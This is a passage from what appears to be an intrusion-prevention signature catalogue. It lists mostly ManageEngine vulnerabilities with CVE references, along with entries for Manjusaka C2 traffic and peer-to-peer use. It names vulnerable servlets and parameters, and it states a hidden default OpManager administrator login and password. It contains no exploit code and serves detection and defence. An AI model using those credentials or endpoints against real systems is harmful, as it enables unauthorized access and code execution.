First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine DesktopCentral
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in ManageEngine Desktop Central. The vulnerability is due to lack of authentication and insufficient input validation in the mdmLogUploader when processing HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.
Situation: HTTP_CRL-Manageengine-Desktop-Central-mdmLogUploader-Directory-Traversal
References:
CVE-2014-5006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5006
BID-69493
http://www.securityfocus.com/bid/69493
OSVDB-110644
http://www.osvdb.org/110644
Back to top

Manageengine-Desktop-Central-Msp-Fileuploadservlet-Arbitrary-File-Upload

About this vulnerability: A vulnerability in ManageEngine DesktopCentral
Risk: Moderate
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: ManageEngine DesktopCentral
Type: Malfunction
Description: An arbitrary file upload vulnerability exists in ManageEngine Desktop Central and Desktop Central MSP. The vulnerability is due to a failure to sanitize filenames uploaded to FileUploadServlet servlet. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the target server. Successful exploitation could lead to arbitrary code execution under the security context of the SYSTEM user.
Situation: HTTP_CRL-Manageengine-Desktop-Central-Msp-Fileuploadservlet-Arbitrary-File-Upload
References:
CVE-2015-8249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8249
OSVDB-121816
http://www.osvdb.org/121816
Back to top

Manageengine-Desktop-Central-Statusupdate-Arbitrary-File-Upload

About this vulnerability: A vulnerability in ManageEngine DesktopCentral
Risk: Moderate
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: ManageEngine DesktopCentral
Type: Directory Traversal
Description: An arbitrary file upload vulnerability exists in ManageEngine Desktop Central. The vulnerability is due to lack of authentication and insufficient input validation of the parameters sent to the StatusUpdate page when processing HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.
Situation: HTTP_CRL-Manageengine-Desktop-Central-Statusupdate-Arbitrary-File-Upload
References:
CVE-2014-5005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5005
BID-69494
http://www.securityfocus.com/bid/69494
OSVDB-110643
http://www.osvdb.org/110643
Back to top

Manageengine-Desktop-Central-Statusupdateservlet-Filename-Directory-Traversal

About this vulnerability: A vulnerability in ManageEngine DesktopCentral
Risk: Moderate
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: ManageEngine DesktopCentral
Type: Directory Traversal
Description: A directory traversal vulnerability exists in ManageEngine Desktop Central MSP. The vulnerability is due to lack of authentication and insufficient input validation of the filename parameter sent to the StatusUpdateServlet page when processing HTTP(S) requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the target server. Successful exploitation could lead to arbitrary code execution under the security context of the system user.
Situation: HTTP_CRL-Manageengine-Desktop-Central-Msp-Statusupdateservlet-Filename-Directory-Traversal
References:
CVE-2014-9404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9404
OSVDB-116802
http://www.osvdb.org/116802
Back to top

Manageengine-Desktop-Central-Unauthorized-Administrative-Password-Reset

About this vulnerability: A vulnerability in ManageEngine Desktop Central
Risk: Moderate
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine DesktopCentral
Type: Malfunction
Description: An access control weakness vulnerability exists in ManageEngine Desktop Central. The vulnerability is due to design error in limiting the admin's password reset functionality to authorized admin users only. This allows any remote unauthenticated users to access the administrative control panel of Desktop Central. A remote unauthenticated user can exploit this vulnerability to modify administrator's credential on Desktop Central.
Situation: HTTP_CRL-Manageengine-Desktop-Central-Unauthorized-Administrative-Password-Reset
References:
CVE-2015-2560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2560
OSVDB-120026
http://www.osvdb.org/120026
Back to top

Manageengine-Desktopcentral-Agentlogupload-Arbitrary-File-Upload

About this vulnerability: A vulnerability in ManageEngine DesktopCentral
Risk: Moderate
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-1732-5242
Platform: Generic
Software: ManageEngine DesktopCentral
Type: Malfunction
Description: A code execution vulnerability has been reported in ManageEngine DesktopCentral. The vulnerability is due to lack of authentication and insufficient input validation in the AgentLogUploadServlet.class when processing HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.
Situation: HTTP_CSU-Manageengine-Desktopcentral-Agentlogupload-Arbitrary-File-Upload
References:
CVE-2013-7390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7390
BID-63784
http://www.securityfocus.com/bid/63784
OSVDB-100008
http://www.osvdb.org/100008
Back to top

Manageengine-Desktopcentral-SQL-Injection

About this vulnerability: A ManageEngine DesktopCentral SQL Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine DesktopCentral
Type: SQL Injection
Description: A vulnerability in ManageEngine Desktop Central v7 build 70200 to v9 build 90033, and Password Manager Pro v6 build 6500 to v7 build 7002, which allows remote attackers to execute arbitrary SQL commands via the sv parameter to LinkViewFetchServlet.dat, possibly allowing the execution of remote code as SYSTEM in Windows or as the user in Linux.
Situation: HTTP_CSU-Manageengine-Desktopcentral-SQL-Injection
References:
CVE-2014-3996
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3996
BID-69305
http://www.securityfocus.com/bid/69305
OSVDB-110198
http://www.osvdb.org/110198
Back to top

Manageengine-DeviceExpert-User-Credentials-Disclosure

About this vulnerability: A Manageengine DeviceExpert User Credentials Disclosure Vulnerability.
Risk: High
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine DeviceExpert
Type: Insecure Configuration
Description: A vulnerability in ManageEngine DeviceExpert, versions before 5.9 build 5981, which allow remote attackers to directly request user credential information.
Situation: HTTP_CSU-Manageengine-DeviceExpert-User-Credentials-Disclosure
References:
CVE-2014-5377
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5377
BID-69443
http://www.securityfocus.com/bid/69443
Back to top

Manageengine-EventLog-Analyzer-Agenthandler-Information-Disclosure

About this vulnerability: A vulnerability in ManageEngine EventLog Analyzer
Risk: Moderate
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: ManageEngine EventLog Analyzer
Type: Input Validation
Description: An information disclosure vulnerability exists in ManageEngine EventLog Analyzer. The vulnerability is due to a failure to restrict access to confidential data and an input validation error in the agentHandler servlet. A remote unauthenticated attacker can exploit the vulnerability to disclose administrator credentials and SQL database data.
Situation: HTTP_CRL-Manageengine-EventLog-Analyzer-Agenthandler-Information-Disclosure
References:
CVE-2014-6038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6038
BID-70959
http://www.securityfocus.com/bid/70959
OSVDB-114342
http://www.osvdb.org/114342
Back to top

Manageengine-EventLog-Analyzer-Agentupload-Directory-Traversal

About this vulnerability: A vulnerability in ManageEngine EventLog Analyzer
Risk: Moderate
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine EventLog Analyzer
Type: Directory Traversal
Description: A code execution vulnerability has been reported in ManageEngine EventLog Analyzer. The vulnerability is due to lack of authentication and insufficient input validation in agentUpload when processing zip files. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.
Situation: HTTP_CS-Manageengine-EventLog-Analyzer-Agentupload-Directory-Traversal
References:
CVE-2014-6037
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6037
BID-69482
http://www.securityfocus.com/bid/69482
OSVDB-110642
http://www.osvdb.org/110642
Back to top

Manageengine-EventLog-Analyzer-Cross-Site-Request-Forgery

About this vulnerability: A vulnerability in ManageEngine EventLog Analyzer
Risk: Moderate
First detected in: sgpkg-ips-649-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: ManageEngine EventLog Analyzer
Type: Input Validation
Description: A cross site request forgery vulnerability exists in ManageEngine EventLog Analyzer. The vulnerability is due to insufficient input validation of parameters sent to event/userManagementForm.do. By convincing a user to follow a malicious link, a remote attacker can exploit this vulnerability to conduct a cross-site request forgery (CSRF) attack on the affected system. A successful exploit could allow the attacker to submit arbitrary requests to the affected system via the web browser with the privileges of the user.
Situation: HTTP_CSH-Manageengine-EventLog-Analyzer-Cross-Site-Request-Forgery
References:
BID-74743
http://www.securityfocus.com/bid/74743
Back to top

Manageengine-EventLog-Analyzer-Hostdetails-Information-Disclosure

About this vulnerability: A vulnerability in ManageEngine EventLog Analyzer
Risk: Moderate
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine EventLog Analyzer
Type: Malfunction
Description: An information disclosure vulnerability exists in ManageEngine EventLog Analyzer. The vulnerability is due to a failure to restrict access to confidential data in the HostDataServlet servlet. A remote unauthenticated attacker can exploit the vulnerability to disclose administrator credentials.
Situation: HTTP_CSU-Manageengine-EventLog-Analyzer-Hostdetails-Information-Disclosure
References:
CVE-2014-6039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6039
BID-70960
http://www.securityfocus.com/bid/70960
OSVDB-114344
http://www.osvdb.org/114344
Back to top

Manageengine-EventLog-Analyzer-runQuery-Guest-User-SQL-Injection

About this vulnerability: A vulnerability in ManageEngine EventLog Analyzer
Risk: High
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ManageEngine EventLog Analyzer
Type: Malfunction
Description: There exists an SQL injection vulnerability in ManageEngine EventLog Analyzer. A remote attacker can use this to execute arbitrary SQL code with SYSTEM privileges.
Situation: HTTP_CRL-Manageengine-EventLog-Analyzer-runQuery-Guest-User-SQL-Injection
References:
CVE-2015-7387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7387
Back to top

Manageengine-Firewall-Analyzer-runQuery-Guest-User-SQL-Injection

About this vulnerability: A vulnerability in ManageEngine Firewall Analyzer
Risk: Moderate
First detected in: sgpkg-ips-748-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine Firewall Analyzer
Type: Input Validation
Description: There exists an SQL injection vulnerability in ManageEngine Firewall Analyzer. A remote attacker can use this to execute arbitrary SQL code with SYSTEM privileges.
Situation: HTTP_CRL-Manageengine-Firewall-Analyzer-runQuery-Guest-User-SQL-Injection
Back to top

Manageengine-Multiple-Products-Customername-SQL-Injection-Remote-Code-Execution

About this vulnerability: A vulnerability in ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine Applications Manager; ManageEngine IT360
Type: Input Validation
Description: An SQL injection vulnerability exists in ManageEngine Applications Manager and ManageEngine IT360 MSP Edition. This vulnerability is due to insufficient validation of certain parameters when processing requests using customerName via CustomerManagementAPI. A remote attacker can exploit this vulnerability to inject and execute arbitrary SQL code on the affected system.
Situation: HTTP_CSU-Manageengine-Multiple-Products-Customername-SQL-Injection-Remote-Code-Execution
Back to top

Manageengine-Multiple-Products-Failoverhelperservlet-Information-Disclosure

About this vulnerability: A vulnerability in ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: ManageEngine Applications Manager; ManageEngine OpManager
Type: Input Validation
Description: An information disclosure vulnerability exists in ManageEngine OpManager, Applications Manager and IT360. The vulnerability is due to lack of authentication and insufficient input validation of the a parameter sent to FailOverHelperServlet in HTTP requests. A remote unauthenticated attacker can leverage this vulnerability by sending malicious HTTP requests the server. Upon successful attack, the attacker can download arbitrary files from arbitrary locations on the server or perform a directory listing to disclose information.
Situation: HTTP_CRL-Manageengine-Multiple-Products-Failoverhelperservlet-Copyfile-Information-Disclosure
HTTP_CRL-Manageengine-Multiple-Products-Failoverhelperservlet-Listdirectory-Information-Disclosure
References:
CVE-2014-7863
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7863
OSVDB-117695
http://www.osvdb.org/117695
Back to top

Manageengine-Multiple-Products-File-Attachment-Directory-Traversal

About this vulnerability: A vulnerability in ManageEngine AssetExplorer
Risk: High
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine AssetExplorer; ManageEngine IT360; ManageEngine ServiceDesk Plus; ManageEngine SupportCenter
Type: Directory Traversal
Description: A directory traversal vulnerability exists in ManageEngine ServiceDesk Plus, AssetExplorer, SupportCenter and IT360. The vulnerability is due to insufficient input validation of the "module" parameter sent in HTTP requests to the server. A remote authenticated attacker can upload or delete arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.
Situation: HTTP_CRL-Manageengine-Multiple-Products-File-Attachment-Directory-Traversal
References:
CVE-2014-5301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5301
OSVDB-116733
http://www.osvdb.org/116733
Back to top

Manageengine-Multiple-Products-Filecollector-Directory-Traversal

About this vulnerability: A vulnerability in ManageEngine IT360
Risk: Moderate
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine IT360; ManageEngine OpManager; ManageEngine Social IT Plus
Type: Directory Traversal
Description: A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation on parameters sent to "/servlets/FileCollector" in HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.
Situation: HTTP_CSU-Manageengine-Multiple-Products-Filecollector-Directory-Traversal
References:
CVE-2014-6035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6035
OSVDB-112277
http://www.osvdb.org/112277
Back to top

Manageengine-Multiple-Products-Filecollector-Dopost-Directory-Traversal

About this vulnerability: A vulnerability in ManageEngine IT360
Risk: Moderate
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine IT360; ManageEngine OpManager; ManageEngine Social IT Plus
Type: Directory Traversal
Description: A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation on parameters sent to "/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector" in HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.
Situation: HTTP_CSU-Manageengine-Multiple-Products-Filecollector-Dopost-Directory-Traversal
References:
CVE-2014-6034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6034
OSVDB-112276
http://www.osvdb.org/112276
Back to top

Manageengine-Multiple-Products-It360sputil-Resids-SQL-Injection

About this vulnerability: A vulnerability in ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine Applications Manager; ManageEngine IT360
Type: Input Validation
Description: An SQL injection vulnerability has been reported in ManageEngine Applications Manager and ManageEngine IT360 MSP Edition. This vulnerability is due to the insufficient validation of user-supplied input when processing requests sent to the It360SPUtil class. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted message to a target server. Successful exploitation will result in injection and execution of arbitrary SQL code on the affected system under the context of SYSTEM.
Situation: HTTP_CSU-Manageengine-Multiple-Products-It360sputil-Resids-SQL-Injection
Back to top

Manageengine-Multiple-Products-Wsdiscoveryservlet-Directory-Traversal

About this vulnerability: A vulnerability in ManageEngine AssetExplorer
Risk: Moderate
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine AssetExplorer; ManageEngine IT360; ManageEngine ServiceDesk Plus
Type: Directory Traversal
Description: A directory traversal vulnerability exists in ManageEngine ServiceDesk Plus, AssetExplorer and IT360. The vulnerability is due to lack of authentication and insufficient input validation on the "computerName" parameter sent in HTTP requests to the WsDiscoveryServlet. A remote unauthenticated attacker can upload or delete arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing crafted files in critical locations.
Situation: HTTP_CRL-Manageengine-Multiple-Products-Wsdiscoveryservlet-Directory-Traversal
References:
CVE-2014-5302
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5302
OSVDB-116737
http://www.osvdb.org/116737
Back to top

Manageengine-NetFlow-Analyzer-And-IT360-Creportpdfservlet-Vulnerability

About this vulnerability: A vulnerability in ManageEngine IT360 and ManageEngine NetFlow
Risk: High
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine IT360; ManageEngine NetFlow
Type: Directory Traversal
Description: An arbitrary file download vulnerability exists in ManageEngine Netflow Analyzer and IT360. The vulnerability is due to lack of authentication and insufficient input validation on the "schFilePath" parameter sent to the CReportPDFServlet in HTTP requests. A remote unauthenticated attacker can download arbitrary files from arbitrary locations on the server by sending malicious requests to it.
Situation: HTTP_CRL-Manageengine-NetFlow-Analyzer-And-IT360-Creportpdfservlet-Arbitrary-File-Download
References:
CVE-2014-5445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5445
BID-71404
http://www.securityfocus.com/bid/71404
OSVDB-115341
http://www.osvdb.org/115341
Back to top

Manageengine-NetFlow-Analyzer-And-IT360-CSVServlet-Arbitrary-File-Download

About this vulnerability: A vulnerability in ManageEngine IT360
Risk: High
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine IT360; ManageEngine NetFlow
Type: Input Validation
Description: An arbitrary file download vulnerability exists in ManageEngine Netflow Analyzer and IT360. The vulnerability is due to lack of authentication and insufficient input validation of the schFilePath parameter sent to CSVServlet in HTTP requests. A remote unauthenticated attacker can download arbitrary files from arbitrary locations on the server by sending malicious requests to it.
Situation: HTTP_CRL-Manageengine-NetFlow-Analyzer-And-IT360-CSVServlet-Arbitrary-File-Download
References:
CVE-2014-5445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5445
BID-71404
http://www.securityfocus.com/bid/71404
OSVDB-115340
http://www.osvdb.org/115340
Back to top

Manageengine-NetFlow-Analyzer-And-IT360-DisplayChartPDF-Directory-Traversal

About this vulnerability: A vulnerability in ManageEngine IT360
Risk: High
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine IT360; ManageEngine NetFlow
Type: Directory Traversal
Description: A directory traversal vulnerability exists in ManageEngine Netflow Analyzer and IT360. The vulnerability is due to lack of authentication and insufficient input validation on the filename parameter sent to the DisplayChartPDF servlet in HTTP requests. A remote unauthenticated attacker can download arbitrary files from arbitrary locations on the server by sending malicious requests to it.
Situation: HTTP_CSU-Manageengine-NetFlow-Analyzer-And-IT360-DisplayChartPDF-Directory-Traversal
References:
CVE-2014-5446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5446
BID-71404
http://www.securityfocus.com/bid/71404
OSVDB-115339
http://www.osvdb.org/115339
Back to top

Manageengine-Opmanager-Agentdetailsutil-Agentkey-SQL-Injection

About this vulnerability: A vulnerability in ManageEngine OpManager
Risk: High
First detected in: sgpkg-ips-673-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine OpManager
Type: Input Validation
Description: An SQL injection vulnerability exists in ManageEngine OpManager. This vulnerability is due to insufficient validation of the agentKey parameter when processing requests sent to "com.manageengine.opmanager.servlet.AgentDetailsUtil". A remote attacker can exploit this vulnerability to inject and execute arbitrary SQL code on the affected system.
Situation: HTTP_CSU-Manageengine-Opmanager-Agentdetailsutil-Agentkey-SQL-Injection
Back to top

Manageengine-Opmanager-Apmalertoperationsservlet-Source-SQL-Injection

About this vulnerability: A vulnerability in ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine OpManager
Type: Input Validation
Description: There is an error in the processing of APMAlertOperationsServlet servlet, which allows an SQL injection.
Situation: HTTP_CRL-Manageengine-Opmanager-Apmalertoperationsservlet-Source-SQL-Injection
Back to top

Manageengine-Opmanager-Apmintegbusinessviewhandler-Opm_bvname-SQL-Injection

About this vulnerability: A vulnerability in ManageEngine OpManager
Risk: High
First detected in: sgpkg-ips-796-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine OpManager
Type: Input Validation
Description: There exists an SQL injection vulnerability in ManageEngine OpManager. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.
Situation: HTTP_CRL-Manageengine-Opmanager-Apmintegbusinessviewhandler-Opm_bvname-SQL-Injection
Back to top

Manageengine-Opmanager-Directory-Deletion-CVE-2021-20078

About this vulnerability: A vulnerability in ManageEngine OpManager
Risk: High
First detected in: sgpkg-ips-1510-5242
Last changed: sgpkg-ips-1510-5242
Platform: Generic
Software: ManageEngine OpManager
Type: Directory Traversal
Description: A path traversal vulnerability has been reported in ManageEngine OpManager. An unauthenticated attacker can use this vulnerability to delete files and directories from the vulnerable server, possibly causing a denial of service condition.
Situation: HTTP_CRL-Manageengine-Opmanager-Directory-Deletion-CVE-2021-20078
References:
CVE-2021-20078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20078
Back to top

Manageengine-Opmanager-SubmitQuery-IntegrationUser-Hidden-Administrator-Account

About this vulnerability: A vulnerability in ManageEngine OpManager
Risk: Moderate
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine OpManager
Type: Input Validation
Description: ManageEngine OpManager has a default hidden administrator account "IntergrationUser" with default password "plugin". The password cannot be changed through the user interface. A remote attacker can login to OpManager using this hidden account and execute SQL commands.
Situation: HTTP_CRL-Manageengine-Opmanager-SubmitQuery-SQL-Injection
HTTP_CRL-Manageengine-Opmanager-Hidden-Administrator-Account-Usage
References:
CVE-2015-7766
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7766
Back to top

Manageengine-Password-Manager-Pro-SQL-Injection

About this vulnerability: A Manageengine Password Manager Pro SQL Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-695-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine Password Manager Pro
Type: SQL Injection
Description: Multiple vulnerabilities in ManageEngine Password Manager Pro, before 7.1 build 7105, which allow remote attackers to execute arbitrary SQL commands via the SEARCH_ALL parameter to either SQLAdvancedALSearchResult.cc or AdvancedSearchResult.cc.
Situation: HTTP_CRL-Manageengine-Password-Manager-Pro-SQL-Injection
References:
CVE-2014-8499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8499
BID-71018
http://www.securityfocus.com/bid/71018
OSVDB-114484
http://www.osvdb.org/114484
Back to top

Manageengine-Recovery-Manager-Plus-XSS-CVE-2018-9163

About this vulnerability: An attempt to exploit a vulnerability in ManageEngine Recovery Manager Plus detected
Risk: High
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Platform: Generic
Software: ManageEngine Recovery Manager Plus
Type: Malfunction
Description: A stored Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Recovery Manager Plus before 5.3 allows remote authenticated users to inject arbitrary web script or HTML via the "loginName" field to "technicianAction.do".
Situation: HTTP_CRL-Manageengine-Recovery-Manager-Plus-XSS-CVE-2018-9163
References:
CVE-2018-9163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9163
Back to top

Manageengine-Security-Manager-Plus-Advanced-Search-SQL-Injection

About this vulnerability: A ManageEngine Security Manager Plus Advanced Search SQL Injection vulnerability
Risk: Moderate
First detected in: sgpkg-ips-867-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ManageEngine Security Manager Plus
Type: SQL Injection
Description: An SQL injection vulnerability in ManageEngine Security Manager Plus, in the advanced search page, which can result in system level remote code execution.
Situation: HTTP_CRL-Manageengine-Security-Manager-Plus-Advanced-Search-SQL-Injection
References:
BID-56138
http://www.securityfocus.com/bid/56138
Back to top

Manageengine-Servicedesk-Downloadfileservlet-Information-Disclosure

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ServiceDesk
Risk: Moderate
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ServiceDesk
Type: Input Validation
Description: There has been reported a directory traversal vulnerability in ManageEngine ServiceDesk for Microsoft Windows. This vulnerability could be exploited by a remote, unauthenticated attacker. Successful exploitation could lead to disclosure of arbitrary file contents from the target server.
Situation: HTTP_CSU-Manageengine-Servicedesk-Downloadfileservlet-Information-Disclosure
References:
CVE-2017-11511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11511
Back to top

Manageengine-Servicedesk-Downloadsnapshotservlet-Directory-Traversal

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine ServiceDesk
Risk: Moderate
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zoho Corporation ManageEngine ServiceDesk
Type: Directory Traversal
Description: Improper handling of HTTP request paths causes a directory traversal vulnerability in Zoho Corporation ManageEngine ServiceDesk. A successful exploit allows an attacker to access arbitrary files on the target system.
Situation: HTTP_CRL-Manageengine-Servicedesk-Downloadsnapshotservlet-Directory-Traversal
References:
CVE-2017-11512
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11512
Back to top

Manageengine-Servicedesk-File-Upload-Directory-Traversal

About this vulnerability: A vulnerability in ManageEngine ServiceDesk Plus
Risk: Moderate
First detected in: sgpkg-ips-686-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine ServiceDesk Plus
Type: Directory Traversal
Description: There is a directory traversal vulnerability in ManageEngine ServiceDesk. Zip-files with directory traversal structures may be used to upload and override arbitrary files in the target server.
Situation: File-Zip_Manageengine-Servicedesk-File-Upload-Directory-Traversal
Back to top

Manageengine-Servicedesk-Filedownload.jsp-Fname-Directory-Traversal

About this vulnerability: A vulnerability in ManageEngine ServiceDesk Plus
Risk: Moderate
First detected in: sgpkg-ips-714-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine ServiceDesk Plus
Type: Directory Traversal
Description: Arbitrary files can be downloaded by exploiting a direcory traversal vulnerability in the ManageEngine ServiceDesk Plus product. The vulnerability is caused by insufficient sanitization of the fname parameter given in the request.
Situation: HTTP_CRL-Manageengine-Servicedesk-Filedownload.jsp-Fname-Directory-Traversal
Back to top

Manageengine-Servicedesk-Plus-User-Privileges-Bypass

About this vulnerability: A vulnerability in ManageEngine ServiceDesk Plus
Risk: Moderate
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine ServiceDesk Plus
Type: Malfunction
Description: A policy bypass vulnerability exists in ManageEngine ServiceDesk Plus. The vulnerability is due to a design weakness when handling certain URLs which require administrative access. A remote, authenticated attacker can exploit this vulnerability by sending a specially crafted request to the target server. Successful exploitation could lead to unauthorized access.
Situation: HTTP_CRL-Manageengine-Servicedesk-Plus-User-Privileges-Bypass
References:
CVE-2015-1480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1480
BID-72302
http://www.securityfocus.com/bid/72302
OSVDB-117499
http://www.osvdb.org/117499
Back to top

Mango-Automation-Scada/Hmi-Cross-Site-Scripting

About this vulnerability: A vulnerability in Mango Automation SCADA/HMI
Risk: High
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Platform: Generic
Software: Mango Automation SCADA/HMI
Type: Cross-site Scripting
Description: Cross Site Scripting vulnerabilities have been reported in data_point_details.shtm in Mango Automation 2.4.0 and earlier versions.
Situation: HTTP_CRL-Mango-Automation-Scada-Cross-Site-Scripting
References:
CVE-2015-1179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1179
Back to top

Manjusaka-C2-GET-Request

About this vulnerability: Manjusaka command and control traffic
Risk: High
First detected in: sgpkg-ips-1492-5242
Last changed: sgpkg-ips-1492-5242
Platform: Windows; Linux
Software: <os>
Type: Backdoor
Description: An HTTP GET request that matches a known Manjusaka framework command and control traffic pattern was detected.
Situation: HTTP_CS-Manjusaka-C2-GET-Request
Back to top

Manolito-Peer-To-Peer-Network-Usage

About this vulnerability: Manolito peer-to-peer network usage
Risk: Moderate
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Manolito
Type: Peer-to-Peer
Description: Manolito is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors.
Situation: P2P-TCP_Manolito-Network-Connect
Back to top

Mantis-Bug-Tracker-Filter-API-View_Type-Cross-Site-Scripting

About this vulnerability: A vulnerability in Mantis Bug Tracker
Risk: Moderate
First detected in: sgpkg-ips-798-5211
